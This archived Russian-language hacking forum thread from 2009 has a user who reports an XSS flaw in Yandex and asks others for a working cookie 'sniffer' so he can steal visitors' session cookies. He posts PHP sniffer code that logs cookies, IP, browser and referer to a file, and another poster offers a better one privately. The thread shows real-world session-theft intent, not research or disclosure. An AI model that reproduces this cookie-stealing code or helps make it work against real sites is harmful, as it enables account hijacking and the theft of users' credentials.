ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > E-Mail
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

Активная xss на Яндекс
  #1  
Старый 26.09.2009, 21:41
satana-fu
Moderator - Level 7
Регистрация: 06.02.2009
Сообщений: 195
Провел на форуме:
2485155

Репутация: 719
Отправить сообщение для satana-fu с помощью ICQ
По умолчанию Активная xss на Яндекс

нашел полуактивную xss на яндекс. Пытаюсь подставить сниффер, не получается, вернее при запросе (document.cookie) все кукисы выдаются, а при замене запроса на сниффер, кукисы на сниффер не приходят.

Готов поделиться xss с тем, кто подскажет работающий сниффер для яндекса (поделюсь xss после проверки снифа), использовал стандартный от Kaniq и этот сниф, но кукисы не пришли

PHP код:
<?PHP  
$Cookies 
UrlDecode(getenv("QUERY_STRING"));  
$Date date("d-m-y H:i:s"time());  
$browser getenv("HTTP_USER_AGENT");  
$ref getenv("HTTP_REFERER");      
$ip getenv("REMOTE_ADDR");  
$text 
$Cookies:  
$Date:  
$browser:  
$ref:  
$ip:  
$query";  

$filelog fopen("base.php","a+");  
fwrite($filelog,"\n $text \n"); 
fclose($filelog);  
header('Location: http://somesite.ru');     
?>
На майле сниффер работает, на яндексе не работает.

Подсказка сниффера тут, помощь в реализации в аську.

Последний раз редактировалось satana-fu; 28.09.2009 в 15:42..
 
Ответить с цитированием

  #2  
Старый 27.09.2009, 17:43
warlok
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
Провел на форуме:
4075418

Репутация: 386
По умолчанию

Цитата:
На майле сниффер работает, на яндексе не работает.
ну и как там может быть?)) ты скорей всего неправильно составил свою xss, тя гдето фильтры режут.
 
Ответить с цитированием

  #3  
Старый 27.09.2009, 18:57
Neogan
Banned
Регистрация: 26.09.2009
Сообщений: 76
Провел на форуме:
877266

Репутация: 0
Отправить сообщение для Neogan с помощью ICQ
По умолчанию

в личку черкни отличный сниф кину
 
Ответить с цитированием

  #4  
Старый 28.09.2009, 01:08
JOHNik
Познающий
Регистрация: 21.04.2009
Сообщений: 58
Провел на форуме:
146521

Репутация: 34
Отправить сообщение для JOHNik с помощью ICQ
По умолчанию

Цитата:
Сообщение от satana-fu  
На майле сниффер работает, на яндексе не работает.
.
Снифферу пох где работать, надо уметь пользоваться просто )
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
[Продам] Яндекс. Активная XSS. brain[pillow] Разное - Покупка, продажа, обмен 3 08.02.2010 21:42
Яндекс vs Google: Дaвид против Голиaфa bender123 Мировые новости 14 27.06.2009 15:20
Активная XSS на mail.ru Dronga E-Mail 69 05.04.2008 01:56
Xss для новичков Micr0b Уязвимости 0 04.06.2006 18:25
Cross Site Scripting FAQ k00p3r Уязвимости 6 12.06.2005 16:23



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ